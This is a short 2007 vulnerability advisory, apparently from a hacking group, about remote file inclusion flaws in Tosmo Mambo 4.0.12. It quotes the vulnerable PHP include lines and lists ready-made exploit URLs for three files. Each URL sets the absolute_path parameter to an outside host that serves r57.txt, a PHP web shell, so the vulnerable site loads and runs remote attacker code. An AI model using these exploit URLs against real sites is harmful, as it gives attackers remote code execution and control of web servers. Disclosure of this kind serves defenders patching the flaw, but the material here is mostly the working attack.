Tosmo Mambo <= 4.0.12 (absolute_path) Multiple RFI Vulnerabilities

2007-04-11T00:00:00
ID SECURITYVULNS:DOC:16661
Type securityvulns
Reporter Securityvulns
Modified 2007-04-11T00:00:00

Description

======================================================= Tosmo Mambo <= 4.0.12 (absolute_path) Multiple RFI Vulnerabilities ======================================================= Found By : Cold z3ro , Cold-z3ro@hotmail.com ======================================================= Homepage: www.Hack-Teach.com ======================================================= Script Site : http://www2.tutorial.hu/letoltes/dl.php?p=/scriptek/joomla/mambo.4.0.x&i=tosmo_mambo.zip ============================================== File : /components/com_minibb.php include("$absolute_path/components/minibb/bb_admin.php"); ====== /components/com_minibb.php?absolute_path=http://nachrichtenmann.de/r57.txt?

========================================================

File : /components/minibb/bb_plugins.php

<?php include ($absolute_path.'/components/minibb/hack_smilies.php'); ?> ====== /components/minibb/bb_plugins.php?absolute_path=http://nachrichtenmann.de/r57.txt? /components/com_minibb/bb_plugins.php?absolute_path=http://nachrichtenmann.de/r57.txt? =======================================================

File : configuration.php?absolute_path=http://nachrichtenmann.de/r57.txt? include_once("$absolute_path/version.php"); ====== /configuration.php?absolute_path=http://nachrichtenmann.de/r57.txt? =======================================================

Long Life Palestine

www.Hack-Teach.com